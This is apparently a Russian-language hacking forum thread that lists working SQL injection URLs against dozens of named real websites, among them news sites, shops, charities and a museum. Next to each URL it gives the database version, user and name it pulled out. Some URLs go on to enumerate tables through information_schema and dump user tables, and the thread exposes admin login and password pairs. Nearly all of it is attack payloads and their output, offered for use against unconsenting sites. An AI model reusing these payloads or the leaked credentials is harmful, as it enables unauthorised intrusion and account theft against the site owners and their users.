SQL Инъекции

оф сайт Edimax

 

gippo.by

Code:

http://gippo.by/news.php?ID=8+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database())/*

Версия: 5.0.24a-Debian_3-log
Юзер: gippoby@localhost
БД: gippoby

Code:

http://gippo.by/news.php?ID=8+union+select+1,2,3,4,concat_ws(0x3a,table_name,column_name)+from+information_schema.columns/*

- таблички и колонки к ним

Code:

http://gippo.by/news.php?ID=8+union+select+1,2,3,4,concat_ws(0x3a,LOGIN,PASS,EMAIL)+from+gippo_Users/*

www.ecogran.ru

Code:

http://www.ecogran.ru/news.php?id=-8+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7/*

Версия - 5.0.32-Debian_7etch3-log
Юзер - zorro_ecogran@localhost
БД - zorro_ecogran

Code:

http://www.ecogran.ru/news.php?id=-8+union+select+1,2,concat_ws(0x3a,table_name,column_name),4,5,6,7+from+information_schema.columns+limit+1,1/*

Таблички и колонки

antennachel.ru

Code:

http://antennachel.ru/news.php?id=8+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database())

Версия - 5.0.45
Юзер - db_antennachel@localhost
БД - antennachel_main

Code:

http://antennachel.ru/news.php?id=8+union+select+1,2,3,4,concat_ws(0x3a,table_name,column_name)+from+information_schema.columns

Таблички и колонки

 

ТАБЛЫ

Code:

http://www.asinfo.com.ua/news_rss/news.php?id=475+union+select+1,2,3,table_name,5+from+information_schema.tables--

ЮЗЕР - asinfoc_asinfou@localhost
ВЕРСИЯ - 5.0.67-community-log

 

http://www.microcomputer.ro/catalog/Catalog%20de%20produse/Oxigen%20O93%20pentru%20acasa/-7+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,version(),database(),user()),9,10.html




Database Version: 5.0.51a
Database name: microcomputer06
User name: [email protected]

 

Kino-Club.ru
PR - 5
Тиц - 325

Code:

http://www.kino-club.ru/catalog_2.php?id=74+union+select+1,2,3,4,concat _ws(0x3a,version(),use r(),database()),6,7--&open=1

Database Version : 5.0.67-log
Database name : [email protected]
User name : a900101722_kino

 

http://www.luxartim.ro/catalog/mobila/Baruri/-46+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6.html


Database Version: 5.0.37
Database name: luxartim
User name: luxartim@localhost

 

Code:

http://www.catholicleader.com.au/index.php?id=-4680+union+select+1,2,3,unhex(hex(version())),5,6,7,8--

 

http://www.imobilesiterenuri.ro/anunt/oferte-vanzari-garsoniera_-83+UNION+SELECT+1,2,3,database(),user(),6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47.html



Version : 5.0.37
Database : imobilesiterenuri
User : imobiliare_01@localhost


look in title...

 

PageRank 6

Version : PostgreSQL 7.3.21-RH on i686-redhat-linux-gnu, compiled by GCC gcc (GCC) 3.2.3 20030502 (Red Hat Linux 3.2.3-59)
Database : ncpadorg_ncpad
user : ncpadorg_www

Version:4.0.16-standard
User: fengyang@localhost
Database: fengyang_web

 

Code:

http://www.mothernaturalclean.com/int.php?id=41+and+0+union+select+1,2,version()--

5.0.51b-community-nt

всех с 23.. грац!​

 

PR6
Peace Talks :: Peace & Security


http://www.ploughshares.org/news.php?id=-540+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--

4.0.24_Debian-10sarge2-log


PR5
Children's Cause for Cancer Advocacy


http://www.childrenscause.org/news.php?id=-201+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,version()--

4.1.22-log

PR6
Columbus Museum of Art

http://www.columbusmuseum.org/about/news.php?id=-13+union+select+1,unhex(hex(version())),3,4,5,6,7,8,9--

4.1.12-standard

 

PageRank 7

PostgreSQL 8.3.6 on i386-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.3.0 20080428 Red Hat 4.3.0-8

Да да да с праздником вас !

Version: 4.1.22-standard-log
User: nwegg@localhost
Database: nwegg

Microsoft SQL Server 2005 - 9.00.3159.00 (Intel X86) Mar 23 2007 16:15:11 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)




PageRank = 6

Database Version: 4.1.10-standard
Database name: ettu_db01
User name: ettu_admin@localhost


PageRank = 5

Database Version:4.1.22
User name: liaa_exim@localhost
Database name: liaa_exim



PageRank = 6

Database Version: 5.0.32-Debian_7etch8
Database name: perlapau
User name: [email protected]




PageRank = 6

Version: 5.0.24a-community-nt
User: worldvisionorgsg@localhost
Database: worldvisionorgsgdata

 

Code:

http://caraibesfm.com/index.php?cat_id=&tim=-1+union+select+1,2,3,4,5,concat_ ws(0x3a,versio n(),database(),user()),7,8,9--

Database Version : 4.1.22-standard
Database name : caraibes_caraibesfm
User name : caraibes_caraibe@localhost

админ:

Code:

http://caraibesfm.com/index.php?cat_id=&tim=-1+union+select+1,2,3,4,5, concat_ ws(0x3a,username,password),7,8,9+from+users+limit+0,1--

Code:

mgattereau:tmomo051399

 

Code:

http://hotel.tver.ru/_content.php?Id=2.5+union+select+1,2,3--

Code:

http://www.gak.kiev.ua/?rubr=life&id=18+union+select+1,2,3,4,5--

 

Code:

http://www.saltykov.net.ru/lib/ar/author/-1+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6

[email protected]:5.0.45-log:u23504_2

 

http://www.thx.ro/notebook--uri-dell/notebook-dell-inspiron-1501-sempron-3500_20_99_251+UNION+SELECT+1,VERSION(),DATABASE(),USER(),5,6,7,8,9,10,11,12,13,14,15+LIMIT+1,1/*.htm



Version : 4.1.22-standard-log
Database : thx_thx
User : thx_thx@localhost

 

www.pioneer-spb.ru

Code:

http://www.pioneer-spb.ru/news.php?id=-17+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6/*

Версия - 5.0.32-Debian_7etch6-log
Юзер - [email protected]
БД - z34747_3

Code:

http://www.pioneer-spb.ru/news.php?id=-17+union+select+1,2,3,concat_ws(0x3a,table_name,column_name),5,6+from+information_schema.columns+limit+340,1/*

Вывод табличек и колонок

Code:

http://www.pioneer-spb.ru/news.php?id=-17+union+select+1,2,3,concat_ws(0x3a,login,pass,name,stat,pri),5,6+from+users+limit+2,1/*

Вывод юзеров
loginass:name
pioneer:liteon:Магазин Pioneer
и т.д. по лимиту

 

Мини-футбольный клуб Динамо-Ямал
Тиц : 325
PR : 5

Code:

http://www.mfkdinamo.ru/index.php?id=4590+union+select+1,2,3,concat _ws(0x3a,version() ,database(),user()),5,6,7,8,9,10--

Database Version : 4.0.26
Database name : wwwmfkdinamoru
User name : [email protected]

недоковырял:

Code:

http://www.mfkdinamo.ru/index.php?id=4590+union+select+1,2, 3,4,5,6 ,7,8,9,10+from+admin--

 

www.referats-online.ru

Code:

http://www.referats-online.ru/news.php?id=17+union+select+concat_ws(0x3a,version(),user(),database()),2,3

Версия - 5.0.70
Юзер - kalinov_refer@localhost
БД - kalinov_refer

Code:

http://www.referats-online.ru/news.php?id=17+union+select+concat_ws(0x3a,table_name,column_name),2,3+from+information_schema.columns

Вывод всех табличек и колонок

 

http://www.stillco.ro/index.php?cat_id=-237'+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,0,1,2,3,4,5,6/*&catname='Toshiba'



Database Version: 5.0.45
Database name: stillco
User name: stillcodb@localhost